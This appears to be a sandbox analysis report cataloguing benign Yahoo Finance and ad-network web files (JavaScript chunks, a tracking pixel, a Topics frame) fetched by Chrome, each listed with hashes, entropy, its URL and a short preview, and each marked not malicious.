                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B296E7198E18A7E222B7F974237100E32A9438D9D68A1D23C8569CDF58142EB6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:512EC5097B2A0D630E8A1F566489FD5C0F66B53C8456ABA75E61520417E7CE22B29D1AA88326AF9E11351C9A63E894D6B9AB28F1EE3D0C670EE9B47E37036C44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as he,p as B,k,i as d,e as S,b as D,d as U,f as Y,j as L,q as w,O as A,L as ne,l as v,t as C,h as I,m as P,n as ae,K as se}from"./scheduler.Dsuh-FKt.js";import{S as de,i as pe,t as g,g as H,a as M,e as Q,c as J,b as Z,m as $,d as x}from"./index.CvwOawEI.js";import{e as re,u as Ee,o as ve}from"./each.CI2tb2RB.js";import{t as R,n as K,N as G,b as j}from"./commonUtil.BWwawKjd.js";import{C as be}from"./Card.B4O9y5RB.js";import{L as ge}from"./Link.vSNQugO0.js";import{S as ke}from"./SectionFooter.xjeo4TXG.js";import{S as ye}from"./SectionHeader.NLJaoS9L.js";import{e as Te}from"./quoteUtil.C6mXO8A-.js";function ie(a,t,l){var c,u,N,y;const e=a.slice();e[23]=t[l];const n=(u=(c=e[7])==null?void 0:c[e[23]])==null?void 0:u.raw;e[24]=n;const s=e[24]>=0?"positive":"negative";e[25]=s;const i=(y=(N=e[11])==null?void 0:N[e[23]])==null?void 0:y.raw;e[26]=i;const o=e[26]>=0?"positive":"negative";e[27]=o;const r=e[5]?e[5]==="sector"?R("SECTOR",{ns:e[0]}):R("INDUSTRY",{ns:e[0]}):e[13];return e[28]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (5123)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4602992437879845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:Mq5umhO6ktJ+FW3hEqmbDNsxgArIEuo12bwxdPUqxcR08+RoBn3vsT:Mq0mhO6SEZnKxgAN120RUhO88a3vsT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3F6BBABD3D7EA1F54389D8082C18AAE5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4F222915294969FDD58FEA9773D5094117ABBD4A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3D7A11299711893FD74F224A54D08BFFCFF06D160BEE2EAD6BD81FE5C9C18C83
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8068BC636C4483F8397C9938B3D42BCBD1AD7C29EDBB2C9165FDD2E637B82F72FFA4BD554F61EF05560D93B61847525F266E7E475043C6EC3E4445016EEFED78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as R,e as C,d as p,f as E,i as y,q as k,O as D,L as b,k as w,l as T,a0 as W,A as X,t as H,b as M,h as J,j as S,B as V,G as Z,a1 as $,m as x}from"./scheduler.Dsuh-FKt.js";import{S as ee,i as le,g as K,e as Q,t as L,a as A,c as ae,b as te,m as se,d as ie}from"./index.CvwOawEI.js";import{e as G,u as ne,o as re}from"./each.CI2tb2RB.js";import{g as oe}from"./spread.CgU5AtxT.js";import{t as fe}from"./commonUtil.BWwawKjd.js";import{I as ue}from"./Icon.C8w5V9EK.js";import{g as O}from"./i13nUtil.8E8_gCdn.js";function P(r,e,t){const l=r.slice();l[8]=e[t],l[21]=t;const s=l[8];return l[9]=s.slk,l[10]=s.label,l[11]=s.selected,l[12]=s.href,l[13]=s.icon,l[14]=s.iconType,l[15]=s.isBeta,l[16]=s.milestone,l[17]=s.onClick,l[18]=s.iconClass,l[19]=W(s,["slk","label","selected","href","icon","iconType","isBeta","milestone","onClick","iconClass"]),l}function U(r){let e,t;return e=new ue({props:{icon:r[13],type:r[14]||"inherit",size:"medium",className:r[18]}}),{c(){ae(e.$$.fragment)},l(l){te(e.$$.fra
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (19456)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):19457
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.519952411704047
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:mxMxWWRbzidUZTbWZ1qBZuU30VqJy2qjZh/dulmpgJIXwUXhYYT2Y8t:qMxWWRbtZTiZQZuUkAwl/JNxn2YC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:34530619DEA15C8DD182C9B127C80E36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:387BB46E22D47B6A63898A5B90A825762E5D053A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8A5D240F56BD26761DD9EAA6185492E0187F20583C14329ADAA71DAC1D5188EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F2B32436D273BC9AF74156251C473BDF86558057AD480567C8C10AD01FCF628BF3D7433BA2F41F4A38B016703D0A6459C67AA26B1D7CB2D4A8A6FAEFAAF0DD8C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as c1,e as U,b as N,d as z,f as L,j as B,i as C,q as h,L as S,k as b,l as H,x as b1,K as I,t as T,p as Q,h as A,m as w1,n as E,O as t1,C as M1,T as x,U as e1}from"./scheduler.Dsuh-FKt.js";import{S as u1,i as _1,g as G,a as y,e as J,t as V,c as O,b as R,m as Y,d as q}from"./index.CvwOawEI.js";import{g as $1}from"./globals.D0QH3NT1.js";import{e as i1}from"./each.CI2tb2RB.js";import{g as n1,m as y1,t as P,W as H1}from"./commonUtil.BWwawKjd.js";import{L as K}from"./Link.vSNQugO0.js";const{Boolean:L1}=$1;function s1(n,e,l){const t=n.slice();return t[33]=e[l].label,t[34]=e[l].url,t}function D1(n){let e,l,t,i,s,a,c;return l=new K({props:{i13nModel:n[13],href:n[11],size:n[3],variant:"subtle",noUnderline:!0,$$slots:{default:[U1]},$$scope:{ctx:n}}}),s=new K({props:{i13nModel:n[13],href:n[12],size:n[3],className:n[0]?"center-dot":"",variant:"subtle",noUnderline:!0,$$slots:{default:[z1]},$$scope:{ctx:n}}}),{c(){e=U("div"),t=U("div"),O(l.$$.fragment),i=N(),a=U("div"),O(s.$$.fragment),this.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://um.simpli.fi/pubmatic?https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODA2JnRsPTUxODQwMA==&piggybackCookie=uid:$UID&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (690)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):691
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.400056759061206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:LTDrZD/T4XMRdE3pFhDImgB3URmNZRaDM7QV0I1aDlKX8CbzqQ+fHki:XfZDr4XMRdE5zgVUaRAVJaDlKXBnKvki
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6EA76FBFBD9BB96AACE1EEA54238290F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F345A537E90BF55445D5329465474CDC771C5DE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6F94A8FB873243F4B38927C5986ADD75392CA219AF0603743EFFA8605A1EE3A5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:50F04A927EC5B2BFFF5A934668ED1B65A823FE2668020C28ED974D58357961E3F62059A0805D8645AA4EA16615CF3EDDD5F4982C318B369E57D62CA4E7D00191
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadChartAssets.YBm7ZMTT.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{_ as A}from"./preload-helper.D6kgxu3v.js";import{c as d}from"./commonUtil.BWwawKjd.js";async function _(n,{denyList:a}={}){const[c]=await d(["assets"],n);a=a||/(finChart.*|finStatic.*|finMetric.*|html2canvas|components)/;const i=[],o=[];await A(()=>import("./webpack-assets-prod.DkcX54ri.js"),[],import.meta.url).then(f=>{const r=f.default;for(const s in r)if(!a.test(s)&&r[s]&&s!==""){let{js:t,css:e}=r[s];t&&(t=Array.isArray(t)?t:[t],i.push(...t)),e&&(e=Array.isArray(e)?e:[e],o.push(...e))}c.addAsset({css:o,js:i.map(s=>({defer:!0,src:s}))})}).then(()=>{typeof window<"u"&&window.dispatchEvent(new CustomEvent("YFINCHART_SRC_LOAD",{detail:{event:"asset-load"}}))})}export{_ as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (40218)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):40312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.657840266464649
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:31VprQr3wORKimw4hMg8Ph5BZ+sIgNEAwTJl64a7gxwKRBEtztWz7:5rwRKzw4hMg8Pv2gWJtZwGBx3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C597112CAFCE2EE4327872C46E05E162
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:802EE76B2550D0E2125A20376E42B3F0B6615EB6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E05824F3203E899BEA610EEE8E5A584FCC62616515F8454D9CD86065F3C2F8D5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:62D1A2EDCD6A52C6BCDBF9236135C213041BFA75E5F68E7B19C3FD01D317B63C400C273E153DAE8A676A2D59C4D4A8B5BB507DFDEDFE9A4DB0D6C72E871D62EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-a4fe50fb.b4fe53ca741b44fe2502.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-a4fe50fb.b4fe53ca741b44fe2502.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[254],{8978:(t,e,r)=>{var i=r(4603);r(1235);o[578658]=function(){for(var t=2;9!==t;)switch(t){case 2:t="object"==typeof globalThis?1:5;break;case 1:return globalThis;case 5:var e;try{for(var r=2;6!==r;)switch(r){case 9:delete e.v9LZn,delete Object.prototype.kCQ7J,r=6;break;case 3:throw"";case 4:r="undefined"==typeof v9LZn?3:9;break;case 2:Object.defineProperty(Object.prototype,"kCQ7J",{get:function(){return this},configurable:!0}),(e=kCQ7J).v9LZn=e,r=4}}catch(i){e=window}return e}}(),o.u3uUq=function(){return"(D7/+0$Y%0A/17%20%5E=,0%0A%20D7&-%20.X%1B173(D'%1D2;&g17,=%22Y%0Am%007)K&%0010$k%20%1D:1'C:&%0E&.Z11*-%1FB;0*:%20G1%1D;,1C&&-%0A/E#%1D%001/K6/;0%1FM17%12=%22O:0;%1F$S%0A%1C915t',,%20%1FL&%2231%0DE7(7:&t6**%1E.C:%1Ddt%1FZ869=/Y%0A3?&2O%0A3+')t'32=5t'32=5t%00%17%12%0A3O06=1%1FF1-9%20)t%3C1;2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (28302)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):105773
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4883920551670995
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:lTQn6LOuNJiVKDqvZHghYjB1KdDIipGOrHkwxqm1RUXCNqvs727ir4ffooY+:enVKsjB1K6EFrHkMqQRrNqvb7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6720D5FF3999C3DFA856DCEF9ACBC689
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F744687FF51F8C758EE83839C82AFEB21CF079AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1C4445F7B3A872A00B8CEE6290D921ACBD528038A8ACF05C963B3E5B5AF32317
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:55ADAE8A1AD2B7CEE3F9E84DB80FF3D48CE25B65D6036B455ABD47CA58AB071AEA56A0736C0971BCECD410552875EC61CDCEDF84217679C4E4C4B316E304D17D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://securepubads.g.doubleclick.net/static/topics/topics_frame.html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="UTF-8" />. <title>Topics Frame</title>. <meta. http-equiv="origin-trial". content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=". />. <script>. ./*.. Copyright 2022 Google LLC. SPDX-License-Identifier: Apache-2.0.*/.var m,aa,ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ca=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},da=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):158
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.994787172741404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yLRmcpZ6CdPtpOq94IhXVHws6Tac3mDDpKfFsLGD/DNKv:yL/pZ6CVCq9JVHwJW1iFqt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CA243B22264DCA7A4A899C51CC2DC963
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CF47310BBB10F981E5735CBCB6196F688782A625
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:95FB5A5390AFDA7B7734B303C9F724039FDA305313CE9517AA5F7A544A208AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:704E626A74A47B560B3316788B46F7CAF94E1E831B9290551C52DBF4D1E8DD8B72BACBBF6164EAA393BD97DABA0C351881B2F9D83A92F3BAAC49322BF9B5040B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/nn/lib/metro/g/myy/advertisement_0.0.19.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:document.write('<div id="advertisement-thamba" style="display:none">Display Advertisement</div>');/* Copyright (c) 2020, Yahoo! Inc. All rights reserved. */.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8787), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8787
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.18863330580164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:/ZtSSViMOpQGb9yjWipq4Z8Yib8Py50D3X2neFaY5E6ZYrlfxBMn:/rs4Q9egLey5uAHjrlfIn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:446C3635A0812F8C988A5E9CA3FC96A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0EFCF277E84D7433A893A01D66CF753705A5F1A8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5F0321E77CA2276D46ACBECA4AFDE142BDD748A373B43F89D3740DEC8AFF091D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8597616D6CEB0607556F4F80279E93D727863DFD7BB53EDAE03DAD9C781A17B8D81E518D9403031B97F68BCC835A7E70F7601237391C1ED803ABEF4C55B6D992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-sticky-1.2.6-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-sticky",[],e):"object"==typeof exports?exports["wafer-sticky"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||{},t.wafer.wafers["wafer-sticky"]=e())}("undefined"!=typeof self?self:this,function(){return function(t){function e(i){if(o[i])return o[i].exports;var r=o[i]={i:i,l:!1,exports:{}};return t[i].call(r.exports,r,r.exports,e),r.l=!0,r.exports}var o={};return e.m=t,e.c=o,e.d=function(t,o,i){e.o(t,o)||Object.defineProperty(t,o,{configurable:!1,enumerable:!0,get:i})},e.n=function(t){var o=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(o,"a",o),o},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"./src/entry.js":function(t,e,o){"use strict";function i(t){if(Array.isArray(t)){for(var e=0,o=Array(t.length);e<t.length;e++)o[e]=t[e];return o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4698)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5733
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.321959729043066
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:OWVgpFipyb6c0SZ/iNSrZOFU01Yf8DR+Q4kMeJgxrWHG59LH+49ZYcl6j:OWGpA4b6eiNSrZOFU01Yf8d+QhMc0rb+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:31DD01F9604A6543D7B6BCF905852312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:48B6FC523734BE1A526CC7F535B73E2FA77BDABF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2BDDAD7177FB15C05B678CF123F02C3374CC39615866C692C2AEC81F63A26513
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C8D90CA1D7A4439EF314E042487B16146E5F6B3D56FB42CA129BA5EFA9799FD4C6A8E302AF5FF356A988FFB81E553E66B694F27B64B68AC2A771DF956DF6D7DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/index.CvwOawEI.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var Q=Object.defineProperty;var T=(t,e,n)=>e in t?Q(t,e,{enumerable:!0,configurable:!0,writable:!0,value:n}):t[e]=n;var I=(t,e,n)=>(T(t,typeof e!="symbol"?e+"":e,n),n);import{n as w,ae as W,i as G,af as X,v as E,a1 as O,R as j,ag as Y,a2 as N,ah as U,f as Z,ai as tt,aj as et,ak as nt,al as it,am as V,an as st,ao as rt,ap as at,aq as ft,ar as ot}from"./scheduler.Dsuh-FKt.js";const H=typeof window<"u";let q=H?()=>window.performance.now():()=>Date.now(),B=H?t=>requestAnimationFrame(t):w;const k=new Set;function J(t){k.forEach(e=>{e.c(t)||(k.delete(e),e.f())}),k.size!==0&&B(J)}function D(t){let e;return k.size===0&&B(J),{promise:new Promise(n=>{k.add(e={c:t,f:n})}),abort(){k.delete(e)}}}const M=new Map;let P=0;function ut(t){let e=5381,n=t.length;for(;n--;)e=(e<<5)-e^t.charCodeAt(n);return e>>>0}function lt(t,e){const n={stylesheet:X(e),rules:{}};return M.set(t,n),n}function z(t,e,n,s,u,a,l,i=0){const c=16.666/s;let r=`{.`;for(let $=0;$<=1;$+=c){const m=e+(n-e)*a($);r+=$*100+`%{${l(m,1-m)}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8487), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8487
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.270730672534649
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:VgHvGB2mC2xiP2TwQG06pvmeHn1IUNsKOcVqAAYyojkb4liN6vD3:GHOB2mC2xjz6pvmgoFkymkUi2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:36FE94E917E5DC731081CE2ED65A7CA7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5F38CFC9B769D4E019EF9234829AAEAEAD4366B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E30B827CDEFDCC2FF2E3FB69D1D0B30E7A9E679B18A2385B3C85FF345FDDBB46
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4816F9EFBFD5C41679A1CC22CBC7828F65AF95866FF67BD063807E8A699C58CC8AA74301A24FE05CADA0970234244A68048AA85C58D56D77A3965092FE8EBB7B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var n=function(n){if(n)return n;try{return document.location.hostname.match(/[\w]+\.([\w]+|co.uk)$/)[0]}catch(n){return""}};const t=function(n,t){for(var e="".concat(n,"="),o=(t||window.document).cookie.split(";"),a=0;a<o.length;a++){var i=(o[a]||"").trim();if(0===i.indexOf(e))return i.substring(e.length,i.length)}return""},e=function(t,e,o,a){(a||window.document).cookie="".concat(t,"=").concat(e,";Max-Age=").concat(31536e3,";Domain=").concat(n(o),";path=/;Secure;SameSite=None")},o=function(t,e,o){(o||window.document).cookie="".concat(t,"=;Max-Age=0;Domain=").concat(n(e),";path=/;Secure;SameSite=None")},a=function(n,t,e){try{var o=(e||window.localStorage).getItem(n);return t?JSON.parse(o):o}catch(n){return null}},i=function(n,t,e,o){try{e?(o||window.localStorage).setItem(n,JSON.stringify(t)):(o||window.localStorage).setItem(n,t)}catch(n){}},c=function(n,t){try{(t||window.localStorage).removeItem(n)}catch(n){}};var r="opus",d=function(n){for(var t=0,e=0;e<n.length;e++
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86037
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.930415980827116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:QkcrZHeiemtvogGLgTXczLMow1wKoAziMwDMRnPP7j:IZhtvogGLO6kADMRPP3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0F65EEF279476EEAC3D7F10F0996F72F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:268AC0E185D53117449ED3EAA735E3A1CEEC4FB4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BD27197E6FE886DEE57C7C95DE2C8EBB53CFABD98B672F62F497794F3FAD2ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EDE5F6318F89D9E66B0C10C4DBEFEDBEC0C34C6A5A99F0FA99FFFD709FFDB5CBEAB20BA5D802A1C114CD6711D3DD1C7E256D1BE975FDA61A3B41E19BEF2DBFB9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/PageProgressBar.BUmOb2ZZ.css
